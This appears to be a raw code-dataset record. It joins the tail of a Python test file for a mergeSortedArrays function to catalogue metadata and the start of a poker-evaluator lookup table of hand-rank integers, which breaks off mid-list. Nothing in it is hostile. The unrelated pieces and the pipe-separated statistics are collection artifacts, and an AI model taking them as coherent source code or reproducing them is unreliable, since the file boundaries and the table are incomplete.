assert mergeSortedArrays(arrays=[[14], [-88, -16, 26, 38, 51, 62, 84, 88]]) == [-88, -16, 14, 26, 38, 51, 62, 84, 88]
def test_mergeSortedArrays_case_16():
assert mergeSortedArrays(arrays=[[-62, -54, -54, 31, 34, 51], [-41], [33, 34], [-98, 68, 83], [-25, -14]]) == [-98, -62, -54, -54, -41, -25, -14, 31, 33, 34, 34, 51, 68, 83]
def test_mergeSortedArrays_case_17():
assert mergeSortedArrays(arrays=[[-53, -16, -13, -11, -6, 21, 26, 35], [-99, -93, -62, -47, -16, 4, 55, 59, 64, 76], [-96, -41, -8], [-39, -28, -4], [-95, -48, -45, -25, 63, 64, 98], [-38, -32, -7, 82], [-42, 25, 49, 79, 86], [-88, -65, 7, 8, 44]]) == [-99, -96, -95, -93, -88, -65, -62, -53, -48, -47, -45, -42, -41, -39, -38, -32, -28, -25, -16, -16, -13, -11, -8, -7, -6, -4, 4, 7, 8, 21, 25, 26, 35, 44, 49, 55, 59, 63, 64, 64, 76, 79, 82, 86, 98]
def test_mergeSortedArrays_case_18():
assert mergeSortedArrays(arrays=[[-33, 57, 74], [-76, -72, -46, -21, -16, -10, 16, 21, 47, 67], [-59, -55, -47, -46, -35, 38], [-62, -25, 3, 30, 46, 71], [-91, -37, -26, -12, -8, 2, 9, 46, 56, 93], [-58, 82, 97]]) == [-91, -76, -72, -62, -59, -58, -55, -47, -46, -46, -37, -35, -33, -26, -25, -21, -16, -12, -10, -8, 2, 3, 9, 16, 21, 30, 38, 46, 46, 47, 56, 57, 67, 71, 74, 82, 93, 97]
def test_mergeSortedArrays_case_19():
assert mergeSortedArrays(arrays=[[-64, -51, -5, 1, 6, 12, 27, 32, 62, 88], [-66, -65, -60, 17, 22], [-57, -7, 13, 70, 79], [-88, -86, -73, -59, -36, -12, 11, 48, 58, 99], [-71, -28], [21, 38], [-55, -44, -27], [-96, -93, -5, 13], [-19, -11, 27, 36, 43, 79, 87], [-72, -53, -10, 1, 27, 77, 88]]) == [-96, -93, -88, -86, -73, -72, -71, -66, -65, -64, -60, -59, -57, -55, -53, -51, -44, -36, -28, -27, -19, -12, -11, -10, -7, -5, -5, 1, 1, 6, 11, 12, 13, 13, 17, 21, 22, 27, 27, 27, 32, 36, 38, 43, 48, 58, 62, 70, 77, 79, 79, 87, 88, 88, 99]
def test_mergeSortedArrays_case_20():
assert mergeSortedArrays(arrays=[[-19, 33, 34], [-94, -53, -10, -3, 44, 73], [27, 42, 70, 86], [-28, 91], [-53, -27, 31, 77, 96, 99]]) == [-94, -53, -53, -28, -27, -19, -10, -3, 27, 31, 33, 34, 42, 44, 70, 73, 77, 86, 91, 96, 99]
| 118.31746 | 588 | 0.490877 | 1,410 | 7,454 | 2.551064 | 0.080851 | 0.038921 | 0.133445 | 0.155685 | 0.116764 | 0.006672 | 0 | 0 | 0 | 0 | 0 | 0.404662 | 0.200027 | 7,454 | 62 | 589 | 120.225806 | 0.198558 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.487805 | 1 | 0.487805 | true | 0 | 0.02439 | 0 | 0.512195 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
a3eb36723997a288b404d50d57da80539a7af48b | 116,216 | py | Python | python/phevaluator/tables/hashtable6.py | azriel1rf/PokerHandEvaluator | c34a25aa58de807f239a0835a359b5642e1c30f6 | [
"Apache-2.0"
] | 161 | 2016-03-10T11:35:12.000Z | 2022-03-27T23:23:22.000Z | python/phevaluator/tables/hashtable6.py | azriel1rf/PokerHandEvaluator | c34a25aa58de807f239a0835a359b5642e1c30f6 | [
"Apache-2.0"
] | 49 | 2016-12-18T09:21:02.000Z | 2022-01-11T10:27:08.000Z | python/phevaluator/tables/hashtable6.py | azriel1rf/PokerHandEvaluator | c34a25aa58de807f239a0835a359b5642e1c30f6 | [
"Apache-2.0"
] | 65 | 2016-04-18T03:12:49.000Z | 2022-02-11T14:48:48.000Z | """Rank values for six cards."""
NO_FLUSH_6 = [
11, 167, 23, 11, 167, 179, 23, 12,
168, 2468, 180, 24, 168, 191, 192, 180,
35, 35, 36, 11, 167, 179, 23, 12,
1610, 2468, 1676, 24, 168, 2479, 2600, 180,
191, 1742, 192, 35, 36, 13, 169, 2469,
181, 25, 169, 2490, 2611, 181, 2480, 2721,
2601, 193, 193, 37, 169, 203, 204, 181,
203, 1808, 204, 205, 205, 193, 47, 47,
48, 47, 48, 49, 11, 167, 179, 23,
12, 1610, 2468, 1676, 24, 168, 2479, 2600,
180, 191, 1742, 192, 35, 36, 13, 1611,
2469, 1677, 25, 1621, 1600, 1600, 1687, 2480,
1600, 2601, 1743, 1753, 37, 169, 2490, 2611,
181, 2491, 1600, 2612, 2721, 2722, 193, 203,
1808, 204, 1809, 1819, 205, 47, 48, 49,
14, 170, 2470, 182, 26, 170, 2501, 2622,
182, 2481, 2732, 2602, 194, 194, 38, 170,
2501, 2622, 182, 2502, 1600, 2623, 2732, 2733,
194, 2492, 2831, 2613, 2831, 2832, 2723, 206,
206, 206, 50, 170, 215, 216, 182, 215,
1874, 216, 217, 217, 194, 215, 1874, 216,
1875, 1885, 217, 218, 218, 218, 206, 59,
59, 60, 59, 60, 61, 59, 60, 61,
62, 11, 167, 179, 23, 12, 1610, 2468,
1676, 24, 168, 2479, 2600, 180, 191, 1742,
192, 35, 36, 13, 1611, 2469, 1677, 25,
1621, 3326, 3546, 1687, 2480, 3766, 2601, 1743,
1753, 37, 169, 2490, 2611, 181, 2491, 3986,
2612, 2721, 2722, 193, 203, 1808, 204, 1809,
1819, 205, 47, 48, 49, 14, 1612, 2470,
1678, 26, 1622, 3327, 3547, 1688, 2481, 3767,
2602, 1744, 1754, 38, 1631, 3336, 3556, 1697,
3381, 1600, 1601, 3776, 1601, 1763, 2492, 3987,
2613, 3996, 1601, 2723, 1810, 1820, 1829, 50,
170, 2501, 2622, 182, 2502, 4206, 2623, 2732,
2733, 194, 2503, 4207, 2624, 4216, 1601, 2734,
2831, 2832, 2833, 206, 215, 1874, 216, 1875,
1885, 217, 1876, 1886, 1895, 218, 59, 60,
61, 62, 15, 171, 2471, 183, 27, 171,
2512, 2633, 183, 2482, 2743, 2603, 195, 195,
39, 171, 2512, 2633, 183, 2513, 4426, 2634,
2743, 2744, 195, 2493, 2842, 2614, 2842, 2843,
2724, 207, 207, 207, 51, 171, 2512, 2633,
183, 2513, 4426, 2634, 2743, 2744, 195, 2514,
4427, 2635, 4436, 1601, 2745, 2842, 2843, 2844,
207, 2504, 2930, 2625, 2930, 2931, 2735, 2930,
2931, 2932, 2834, 219, 219, 219, 219, 63,
171, 227, 228, 183, 227, 1940, 228, 229,
229, 195, 227, 1940, 228, 1941, 1951, 229,
230, 230, 230, 207, 227, 1940, 228, 1941,
1951, 229, 1942, 1952, 1961, 230, 231, 231,
231, 231, 219, 71, 71, 72, 71, 72,
73, 71, 72, 73, 74, 71, 72, 73,
74, 75, 11, 167, 179, 23, 12, 1610,
2468, 1676, 24, 168, 2479, 2600, 180, 191,
1742, 192, 35, 36, 13, 1611, 2469, 1677,
25, 1621, 3326, 3546, 1687, 2480, 3766, 2601,
1743, 1753, 37, 169, 2490, 2611, 181, 2491,
3986, 2612, 2721, 2722, 193, 203, 1808, 204,
1809, 1819, 205, 47, 48, 49, 14, 1612,
2470, 1678, 26, 1622, 3327, 3547, 1688, 2481,
3767, 2602, 1744, 1754, 38, 1631, 3336, 3556,
1697, 3381, 1600, 3601, 3776, 3821, 1763, 2492,
3987, 2613, 3996, 4041, 2723, 1810, 1820, 1829,
50, 170, 2501, 2622, 182, 2502, 4206, 2623,
2732, 2733, 194, 2503, 4207, 2624, 4216, 4261,
2734, 2831, 2832, 2833, 206, 215, 1874, 216,
1875, 1885, 217, 1876, 1886, 1895, 218, 59,
60, 61, 62, 15, 1613, 2471, 1679, 27,
1623, 3328, 3548, 1689, 2482, 3768, 2603, 1745,
1755, 39, 1632, 3337, 3557, 1698, 3382, 6186,
3602, 3777, 3822, 1764, 2493, 3988, 2614, 3997,
4042, 2724, 1811, 1821, 1830, 51, 1640, 3345,
3565, 1706, 3390, 6194, 3610, 3785, 3830, 1772,
3426, 6230, 3646, 1602, 1601, 1602, 4005, 4050,
1602, 1838, 2504, 4208, 2625, 4217, 4262, 2735,
4225, 4270, 1602, 2834, 1877, 1887, 1896, 1904,
63, 171, 2512, 2633, 183, 2513, 4426, 2634,
2743, 2744, 195, 2514, 4427, 2635, 4436, 4481,
2745, 2842, 2843, 2844, 207, 2515, 4428, 2636,
4437, 4482, 2746, 4445, 4490, 1602, 2845, 2930,
2931, 2932, 2933, 219, 227, 1940, 228, 1941,
1951, 229, 1942, 1952, 1961, 230, 1943, 1953,
1962, 1970, 231, 71, 72, 73, 74, 75,
16, 172, 2472, 184, 28, 172, 2523, 2644,
184, 2483, 2754, 2604, 196, 196, 40, 172,
2523, 2644, 184, 2524, 4646, 2645, 2754, 2755,
196, 2494, 2853, 2615, 2853, 2854, 2725, 208,
208, 208, 52, 172, 2523, 2644, 184, 2524,
4646, 2645, 2754, 2755, 196, 2525, 4647, 2646,
4656, 4701, 2756, 2853, 2854, 2855, 208, 2505,
2941, 2626, 2941, 2942, 2736, 2941, 2942, 2943,
2835, 220, 220, 220, 220, 64, 172, 2523,
2644, 184, 2524, 4646, 2645, 2754, 2755, 196,
2525, 4647, 2646, 4656, 4701, 2756, 2853, 2854,
2855, 208, 2526, 4648, 2647, 4657, 4702, 2757,
4665, 4710, 1602, 2856, 2941, 2942, 2943, 2944,
220, 2516, 3018, 2637, 3018, 3019, 2747, 3018,
3019, 3020, 2846, 3018, 3019, 3020, 3021, 2934,
232, 232, 232, 232, 232, 76, 172, 239,
240, 184, 239, 2006, 240, 241, 241, 196,
239, 2006, 240, 2007, 2017, 241, 242, 242,
242, 208, 239, 2006, 240, 2007, 2017, 241,
2008, 2018, 2027, 242, 243, 243, 243, 243,
220, 239, 2006, 240, 2007, 2017, 241, 2008,
2018, 2027, 242, 2009, 2019, 2028, 2036, 243,
244, 244, 244, 244, 244, 232, 83, 83,
84, 83, 84, 85, 83, 84, 85, 86,
83, 84, 85, 86, 87, 83, 84, 85,
86, 87, 88, 11, 167, 179, 23, 12,
1610, 2468, 1676, 24, 168, 2479, 2600, 180,
191, 1742, 192, 35, 36, 13, 1611, 2469,
1677, 25, 1621, 3326, 3546, 1687, 2480, 3766,
2601, 1743, 1753, 37, 169, 2490, 2611, 181,
2491, 3986, 2612, 2721, 2722, 193, 203, 1808,
204, 1809, 1819, 205, 47, 48, 49, 14,
1612, 2470, 1678, 26, 1622, 3327, 3547, 1688,
2481, 3767, 2602, 1744, 1754, 38, 1631, 3336,
3556, 1697, 3381, 1600, 3601, 3776, 3821, 1763,
2492, 3987, 2613, 3996, 4041, 2723, 1810, 1820,
1829, 50, 170, 2501, 2622, 182, 2502, 4206,
2623, 2732, 2733, 194, 2503, 4207, 2624, 4216,
4261, 2734, 2831, 2832, 2833, 206, 215, 1874,
216, 1875, 1885, 217, 1876, 1886, 1895, 218,
59, 60, 61, 62, 15, 1613, 2471, 1679,
27, 1623, 3328, 3548, 1689, 2482, 3768, 2603,
1745, 1755, 39, 1632, 3337, 3557, 1698, 3382,
6186, 3602, 3777, 3822, 1764, 2493, 3988, 2614,
3997, 4042, 2724, 1811, 1821, 1830, 51, 1640,
3345, 3565, 1706, 3390, 6194, 3610, 3785, 3830,
1772, 3426, 6230, 3646, 6350, 1601, 3866, 4005,
4050, 4086, 1838, 2504, 4208, 2625, 4217, 4262,
2735, 4225, 4270, 4306, 2834, 1877, 1887, 1896,
1904, 63, 171, 2512, 2633, 183, 2513, 4426,
2634, 2743, 2744, 195, 2514, 4427, 2635, 4436,
4481, 2745, 2842, 2843, 2844, 207, 2515, 4428,
2636, 4437, 4482, 2746, 4445, 4490, 4526, 2845,
2930, 2931, 2932, 2933, 219, 227, 1940, 228,
1941, 1951, 229, 1942, 1952, 1961, 230, 1943,
1953, 1962, 1970, 231, 71, 72, 73, 74,
75, 16, 1614, 2472, 1680, 28, 1624, 3329,
3549, 1690, 2483, 3769, 2604, 1746, 1756, 40,
1633, 3338, 3558, 1699, 3383, 6187, 3603, 3778,
3823, 1765, 2494, 3989, 2615, 3998, 4043, 2725,
1812, 1822, 1831, 52, 1641, 3346, 3566, 1707,
3391, 6195, 3611, 3786, 3831, 1773, 3427, 6231,
3647, 6351, 6679, 3867, 4006, 4051, 4087, 1839,
2505, 4209, 2626, 4218, 4263, 2736, 4226, 4271,
4307, 2835, 1878, 1888, 1897, 1905, 64, 1648,
3353, 3573, 1714, 3398, 6202, 3618, 3793, 3838,
1780, 3434, 6238, 3654, 6358, 6686, 3874, 4013,
4058, 4094, 1846, 3462, 6266, 3682, 6386, 6714,
3902, 1603, 1603, 1602, 1603, 4233, 4278, 4314,
1603, 1912, 2516, 4429, 2637, 4438, 4483, 2747,
4446, 4491, 4527, 2846, 4453, 4498, 4534, 1603,
2934, 1944, 1954, 1963, 1971, 1978, 76, 172,
2523, 2644, 184, 2524, 4646, 2645, 2754, 2755,
196, 2525, 4647, 2646, 4656, 4701, 2756, 2853,
2854, 2855, 208, 2526, 4648, 2647, 4657, 4702,
2757, 4665, 4710, 4746, 2856, 2941, 2942, 2943,
2944, 220, 2527, 4649, 2648, 4658, 4703, 2758,
4666, 4711, 4747, 2857, 4673, 4718, 4754, 1603,
2945, 3018, 3019, 3020, 3021, 3022, 232, 239,
2006, 240, 2007, 2017, 241, 2008, 2018, 2027,
242, 2009, 2019, 2028, 2036, 243, 2010, 2020,
2029, 2037, 2044, 244, 83, 84, 85, 86,
87, 88, 17, 173, 2473, 185, 29, 173,
2534, 2655, 185, 2484, 2765, 2605, 197, 197,
41, 173, 2534, 2655, 185, 2535, 4866, 2656,
2765, 2766, 197, 2495, 2864, 2616, 2864, 2865,
2726, 209, 209, 209, 53, 173, 2534, 2655,
185, 2535, 4866, 2656, 2765, 2766, 197, 2536,
4867, 2657, 4876, 4921, 2767, 2864, 2865, 2866,
209, 2506, 2952, 2627, 2952, 2953, 2737, 2952,
2953, 2954, 2836, 221, 221, 221, 221, 65,
173, 2534, 2655, 185, 2535, 4866, 2656, 2765,
2766, 197, 2536, 4867, 2657, 4876, 4921, 2767,
2864, 2865, 2866, 209, 2537, 4868, 2658, 4877,
4922, 2768, 4885, 4930, 4966, 2867, 2952, 2953,
2954, 2955, 221, 2517, 3029, 2638, 3029, 3030,
2748, 3029, 3030, 3031, 2847, 3029, 3030, 3031,
3032, 2935, 233, 233, 233, 233, 233, 77,
173, 2534, 2655, 185, 2535, 4866, 2656, 2765,
2766, 197, 2536, 4867, 2657, 4876, 4921, 2767,
2864, 2865, 2866, 209, 2537, 4868, 2658, 4877,
4922, 2768, 4885, 4930, 4966, 2867, 2952, 2953,
2954, 2955, 221, 2538, 4869, 2659, 4878, 4923,
2769, 4886, 4931, 4967, 2868, 4893, 4938, 4974,
1603, 2956, 3029, 3030, 3031, 3032, 3033, 233,
2528, 3095, 2649, 3095, 3096, 2759, 3095, 3096,
3097, 2858, 3095, 3096, 3097, 3098, 2946, 3095,
3096, 3097, 3098, 3099, 3023, 245, 245, 245,
245, 245, 245, 89, 173, 251, 252, 185,
251, 2072, 252, 253, 253, 197, 251, 2072,
252, 2073, 2083, 253, 254, 254, 254, 209,
251, 2072, 252, 2073, 2083, 253, 2074, 2084,
2093, 254, 255, 255, 255, 255, 221, 251,
2072, 252, 2073, 2083, 253, 2074, 2084, 2093,
254, 2075, 2085, 2094, 2102, 255, 256, 256,
256, 256, 256, 233, 251, 2072, 252, 2073,
2083, 253, 2074, 2084, 2093, 254, 2075, 2085,
2094, 2102, 255, 2076, 2086, 2095, 2103, 2110,
256, 257, 257, 257, 257, 257, 257, 245,
95, 95, 96, 95, 96, 97, 95, 96,
97, 98, 95, 96, 97, 98, 99, 95,
96, 97, 98, 99, 100, 95, 96, 97,
98, 99, 100, 101, 11, 167, 179, 23,
12, 1610, 2468, 1676, 24, 168, 2479, 2600,
180, 191, 1742, 192, 35, 36, 13, 1611,
2469, 1677, 25, 1621, 3326, 3546, 1687, 2480,
3766, 2601, 1743, 1753, 37, 169, 2490, 2611,
181, 2491, 3986, 2612, 2721, 2722, 193, 203,
1808, 204, 1809, 1819, 205, 47, 48, 49,
14, 1612, 2470, 1678, 26, 1622, 3327, 3547,
1688, 2481, 3767, 2602, 1744, 1754, 38, 1631,
3336, 3556, 1697, 3381, 1600, 3601, 3776, 3821,
1763, 2492, 3987, 2613, 3996, 4041, 2723, 1810,
1820, 1829, 50, 170, 2501, 2622, 182, 2502,
4206, 2623, 2732, 2733, 194, 2503, 4207, 2624,
4216, 4261, 2734, 2831, 2832, 2833, 206, 215,
1874, 216, 1875, 1885, 217, 1876, 1886, 1895,
218, 59, 60, 61, 62, 15, 1613, 2471,
1679, 27, 1623, 3328, 3548, 1689, 2482, 3768,
2603, 1745, 1755, 39, 1632, 3337, 3557, 1698,
3382, 6186, 3602, 3777, 3822, 1764, 2493, 3988,
2614, 3997, 4042, 2724, 1811, 1821, 1830, 51,
1640, 3345, 3565, 1706, 3390, 6194, 3610, 3785,
3830, 1772, 3426, 6230, 3646, 6350, 1601, 3866,
4005, 4050, 4086, 1838, 2504, 4208, 2625, 4217,
4262, 2735, 4225, 4270, 4306, 2834, 1877, 1887,
1896, 1904, 63, 171, 2512, 2633, 183, 2513,
4426, 2634, 2743, 2744, 195, 2514, 4427, 2635,
4436, 4481, 2745, 2842, 2843, 2844, 207, 2515,
4428, 2636, 4437, 4482, 2746, 4445, 4490, 4526,
2845, 2930, 2931, 2932, 2933, 219, 227, 1940,
228, 1941, 1951, 229, 1942, 1952, 1961, 230,
1943, 1953, 1962, 1970, 231, 71, 72, 73,
74, 75, 16, 1614, 2472, 1680, 28, 1624,
3329, 3549, 1690, 2483, 3769, 2604, 1746, 1756,
40, 1633, 3338, 3558, 1699, 3383, 6187, 3603,
3778, 3823, 1765, 2494, 3989, 2615, 3998, 4043,
2725, 1812, 1822, 1831, 52, 1641, 3346, 3566,
1707, 3391, 6195, 3611, 3786, 3831, 1773, 3427,
6231, 3647, 6351, 6679, 3867, 4006, 4051, 4087,
1839, 2505, 4209, 2626, 4218, 4263, 2736, 4226,
4271, 4307, 2835, 1878, 1888, 1897, 1905, 64,
1648, 3353, 3573, 1714, 3398, 6202, 3618, 3793,
3838, 1780, 3434, 6238, 3654, 6358, 6686, 3874,
4013, 4058, 4094, 1846, 3462, 6266, 3682, 6386,
6714, 3902, 6470, 6798, 1602, 4122, 4233, 4278,
4314, 4342, 1912, 2516, 4429, 2637, 4438, 4483,
2747, 4446, 4491, 4527, 2846, 4453, 4498, 4534,
4562, 2934, 1944, 1954, 1963, 1971, 1978, 76,
172, 2523, 2644, 184, 2524, 4646, 2645, 2754,
2755, 196, 2525, 4647, 2646, 4656, 4701, 2756,
2853, 2854, 2855, 208, 2526, 4648, 2647, 4657,
4702, 2757, 4665, 4710, 4746, 2856, 2941, 2942,
2943, 2944, 220, 2527, 4649, 2648, 4658, 4703,
2758, 4666, 4711, 4747, 2857, 4673, 4718, 4754,
4782, 2945, 3018, 3019, 3020, 3021, 3022, 232,
239, 2006, 240, 2007, 2017, 241, 2008, 2018,
2027, 242, 2009, 2019, 2028, 2036, 243, 2010,
2020, 2029, 2037, 2044, 244, 83, 84, 85,
86, 87, 88, 17, 1615, 2473, 1681, 29,
1625, 3330, 3550, 1691, 2484, 3770, 2605, 1747,
1757, 41, 1634, 3339, 3559, 1700, 3384, 6188,
3604, 3779, 3824, 1766, 2495, 3990, 2616, 3999,
4044, 2726, 1813, 1823, 1832, 53, 1642, 3347,
3567, 1708, 3392, 6196, 3612, 3787, 3832, 1774,
3428, 6232, 3648, 6352, 6680, 3868, 4007, 4052,
4088, 1840, 2506, 4210, 2627, 4219, 4264, 2737,
4227, 4272, 4308, 2836, 1879, 1889, 1898, 1906,
65, 1649, 3354, 3574, 1715, 3399, 6203, 3619,
3794, 3839, 1781, 3435, 6239, 3655, 6359, 6687,
3875, 4014, 4059, 4095, 1847, 3463, 6267, 3683,
6387, 6715, 3903, 6471, 6799, 7008, 4123, 4234,
4279, 4315, 4343, 1913, 2517, 4430, 2638, 4439,
4484, 2748, 4447, 4492, 4528, 2847, 4454, 4499,
4535, 4563, 2935, 1945, 1955, 1964, 1972, 1979,
77, 1655, 3360, 3580, 1721, 3405, 6209, 3625,
3800, 3845, 1787, 3441, 6245, 3661, 6365, 6693,
3881, 4020, 4065, 4101, 1853, 3469, 6273, 3689,
6393, 6721, 3909, 6477, 6805, 7014, 4129, 4240,
4285, 4321, 4349, 1919, 3490, 6294, 3710, 6414,
6742, 3930, 6498, 6826, 7035, 4150, 1604, 1604,
1604, 1603, 1604, 4460, 4505, 4541, 4569, 1604,
1985, 2528, 4650, 2649, 4659, 4704, 2759, 4667,
4712, 4748, 2858, 4674, 4719, 4755, 4783, 2946,
4680, 4725, 4761, 4789, 1604, 3023, 2011, 2021,
2030, 2038, 2045, 2051, 89, 173, 2534, 2655,
185, 2535, 4866, 2656, 2765, 2766, 197, 2536,
4867, 2657, 4876, 4921, 2767, 2864, 2865, 2866,
209, 2537, 4868, 2658, 4877, 4922, 2768, 4885,
4930, 4966, 2867, 2952, 2953, 2954, 2955, 221,
2538, 4869, 2659, 4878, 4923, 2769, 4886, 4931,
4967, 2868, 4893, 4938, 4974, 5002, 2956, 3029,
3030, 3031, 3032, 3033, 233, 2539, 4870, 2660,
4879, 4924, 2770, 4887, 4932, 4968, 2869, 4894,
4939, 4975, 5003, 2957, 4900, 4945, 4981, 5009,
1604, 3034, 3095, 3096, 3097, 3098, 3099, 3100,
245, 251, 2072, 252, 2073, 2083, 253, 2074,
2084, 2093, 254, 2075, 2085, 2094, 2102, 255,
2076, 2086, 2095, 2103, 2110, 256, 2077, 2087,
2096, 2104, 2111, 2117, 257, 95, 96, 97,
98, 99, 100, 101, 18, 174, 2474, 186,
30, 174, 2545, 2666, 186, 2485, 2776, 2606,
198, 198, 42, 174, 2545, 2666, 186, 2546,
5086, 2667, 2776, 2777, 198, 2496, 2875, 2617,
2875, 2876, 2727, 210, 210, 210, 54, 174,
2545, 2666, 186, 2546, 5086, 2667, 2776, 2777,
198, 2547, 5087, 2668, 5096, 5141, 2778, 2875,
2876, 2877, 210, 2507, 2963, 2628, 2963, 2964,
2738, 2963, 2964, 2965, 2837, 222, 222, 222,
222, 66, 174, 2545, 2666, 186, 2546, 5086,
2667, 2776, 2777, 198, 2547, 5087, 2668, 5096,
5141, 2778, 2875, 2876, 2877, 210, 2548, 5088,
2669, 5097, 5142, 2779, 5105, 5150, 5186, 2878,
2963, 2964, 2965, 2966, 222, 2518, 3040, 2639,
3040, 3041, 2749, 3040, 3041, 3042, 2848, 3040,
3041, 3042, 3043, 2936, 234, 234, 234, 234,
234, 78, 174, 2545, 2666, 186, 2546, 5086,
2667, 2776, 2777, 198, 2547, 5087, 2668, 5096,
5141, 2778, 2875, 2876, 2877, 210, 2548, 5088,
2669, 5097, 5142, 2779, 5105, 5150, 5186, 2878,
2963, 2964, 2965, 2966, 222, 2549, 5089, 2670,
5098, 5143, 2780, 5106, 5151, 5187, 2879, 5113,
5158, 5194, 5222, 2967, 3040, 3041, 3042, 3043,
3044, 234, 2529, 3106, 2650, 3106, 3107, 2760,
3106, 3107, 3108, 2859, 3106, 3107, 3108, 3109,
2947, 3106, 3107, 3108, 3109, 3110, 3024, 246,
246, 246, 246, 246, 246, 90, 174, 2545,
2666, 186, 2546, 5086, 2667, 2776, 2777, 198,
2547, 5087, 2668, 5096, 5141, 2778, 2875, 2876,
2877, 210, 2548, 5088, 2669, 5097, 5142, 2779,
5105, 5150, 5186, 2878, 2963, 2964, 2965, 2966,
222, 2549, 5089, 2670, 5098, 5143, 2780, 5106,
5151, 5187, 2879, 5113, 5158, 5194, 5222, 2967,
3040, 3041, 3042, 3043, 3044, 234, 2550, 5090,
2671, 5099, 5144, 2781, 5107, 5152, 5188, 2880,
5114, 5159, 5195, 5223, 2968, 5120, 5165, 5201,
5229, 1604, 3045, 3106, 3107, 3108, 3109, 3110,
3111, 246, 2540, 3161, 2661, 3161, 3162, 2771,
3161, 3162, 3163, 2870, 3161, 3162, 3163, 3164,
2958, 3161, 3162, 3163, 3164, 3165, 3035, 3161,
3162, 3163, 3164, 3165, 3166, 3101, 258, 258,
258, 258, 258, 258, 258, 102, 174, 263,
264, 186, 263, 2138, 264, 265, 265, 198,
263, 2138, 264, 2139, 2149, 265, 266, 266,
266, 210, 263, 2138, 264, 2139, 2149, 265,
2140, 2150, 2159, 266, 267, 267, 267, 267,
222, 263, 2138, 264, 2139, 2149, 265, 2140,
2150, 2159, 266, 2141, 2151, 2160, 2168, 267,
268, 268, 268, 268, 268, 234, 263, 2138,
264, 2139, 2149, 265, 2140, 2150, 2159, 266,
2141, 2151, 2160, 2168, 267, 2142, 2152, 2161,
2169, 2176, 268, 269, 269, 269, 269, 269,
269, 246, 263, 2138, 264, 2139, 2149, 265,
2140, 2150, 2159, 266, 2141, 2151, 2160, 2168,
267, 2142, 2152, 2161, 2169, 2176, 268, 2143,
2153, 2162, 2170, 2177, 2183, 269, 270, 270,
270, 270, 270, 270, 270, 258, 107, 107,
108, 107, 108, 109, 107, 108, 109, 110,
107, 108, 109, 110, 111, 107, 108, 109,
110, 111, 112, 107, 108, 109, 110, 111,
112, 113, 107, 108, 109, 110, 111, 112,
113, 114, 11, 167, 179, 23, 12, 1610,
2468, 1676, 24, 168, 2479, 2600, 180, 191,
1742, 192, 35, 36, 13, 1611, 2469, 1677,
25, 1621, 3326, 3546, 1687, 2480, 3766, 2601,
1743, 1753, 37, 169, 2490, 2611, 181, 2491,
3986, 2612, 2721, 2722, 193, 203, 1808, 204,
1809, 1819, 205, 47, 48, 49, 14, 1612,
2470, 1678, 26, 1622, 3327, 3547, 1688, 2481,
3767, 2602, 1744, 1754, 38, 1631, 3336, 3556,
1697, 3381, 1600, 3601, 3776, 3821, 1763, 2492,
3987, 2613, 3996, 4041, 2723, 1810, 1820, 1829,
50, 170, 2501, 2622, 182, 2502, 4206, 2623,
2732, 2733, 194, 2503, 4207, 2624, 4216, 4261,
2734, 2831, 2832, 2833, 206, 215, 1874, 216,
1875, 1885, 217, 1876, 1886, 1895, 218, 59,
60, 61, 62, 15, 1613, 2471, 1679, 27,
1623, 3328, 3548, 1689, 2482, 3768, 2603, 1745,
1755, 39, 1632, 3337, 3557, 1698, 3382, 6186,
3602, 3777, 3822, 1764, 2493, 3988, 2614, 3997,
4042, 2724, 1811, 1821, 1830, 51, 1640, 3345,
3565, 1706, 3390, 6194, 3610, 3785, 3830, 1772,
3426, 6230, 3646, 6350, 1601, 3866, 4005, 4050,
4086, 1838, 2504, 4208, 2625, 4217, 4262, 2735,
4225, 4270, 4306, 2834, 1877, 1887, 1896, 1904,
63, 171, 2512, 2633, 183, 2513, 4426, 2634,
2743, 2744, 195, 2514, 4427, 2635, 4436, 4481,
2745, 2842, 2843, 2844, 207, 2515, 4428, 2636,
4437, 4482, 2746, 4445, 4490, 4526, 2845, 2930,
2931, 2932, 2933, 219, 227, 1940, 228, 1941,
1951, 229, 1942, 1952, 1961, 230, 1943, 1953,
1962, 1970, 231, 71, 72, 73, 74, 75,
16, 1614, 2472, 1680, 28, 1624, 3329, 3549,
1690, 2483, 3769, 2604, 1746, 1756, 40, 1633,
3338, 3558, 1699, 3383, 6187, 3603, 3778, 3823,
1765, 2494, 3989, 2615, 3998, 4043, 2725, 1812,
1822, 1831, 52, 1641, 3346, 3566, 1707, 3391,
6195, 3611, 3786, 3831, 1773, 3427, 6231, 3647,
6351, 6679, 3867, 4006, 4051, 4087, 1839, 2505,
4209, 2626, 4218, 4263, 2736, 4226, 4271, 4307,
2835, 1878, 1888, 1897, 1905, 64, 1648, 3353,
3573, 1714, 3398, 6202, 3618, 3793, 3838, 1780,
3434, 6238, 3654, 6358, 6686, 3874, 4013, 4058,
4094, 1846, 3462, 6266, 3682, 6386, 6714, 3902,
6470, 6798, 1602, 4122, 4233, 4278, 4314, 4342,
1912, 2516, 4429, 2637, 4438, 4483, 2747, 4446,
4491, 4527, 2846, 4453, 4498, 4534, 4562, 2934,
1944, 1954, 1963, 1971, 1978, 76, 172, 2523,
2644, 184, 2524, 4646, 2645, 2754, 2755, 196,
2525, 4647, 2646, 4656, 4701, 2756, 2853, 2854,
2855, 208, 2526, 4648, 2647, 4657, 4702, 2757,
4665, 4710, 4746, 2856, 2941, 2942, 2943, 2944,
220, 2527, 4649, 2648, 4658, 4703, 2758, 4666,
4711, 4747, 2857, 4673, 4718, 4754, 4782, 2945,
3018, 3019, 3020, 3021, 3022, 232, 239, 2006,
240, 2007, 2017, 241, 2008, 2018, 2027, 242,
2009, 2019, 2028, 2036, 243, 2010, 2020, 2029,
2037, 2044, 244, 83, 84, 85, 86, 87,
88, 17, 1615, 2473, 1681, 29, 1625, 3330,
3550, 1691, 2484, 3770, 2605, 1747, 1757, 41,
1634, 3339, 3559, 1700, 3384, 6188, 3604, 3779,
3824, 1766, 2495, 3990, 2616, 3999, 4044, 2726,
1813, 1823, 1832, 53, 1642, 3347, 3567, 1708,
3392, 6196, 3612, 3787, 3832, 1774, 3428, 6232,
3648, 6352, 6680, 3868, 4007, 4052, 4088, 1840,
2506, 4210, 2627, 4219, 4264, 2737, 4227, 4272,
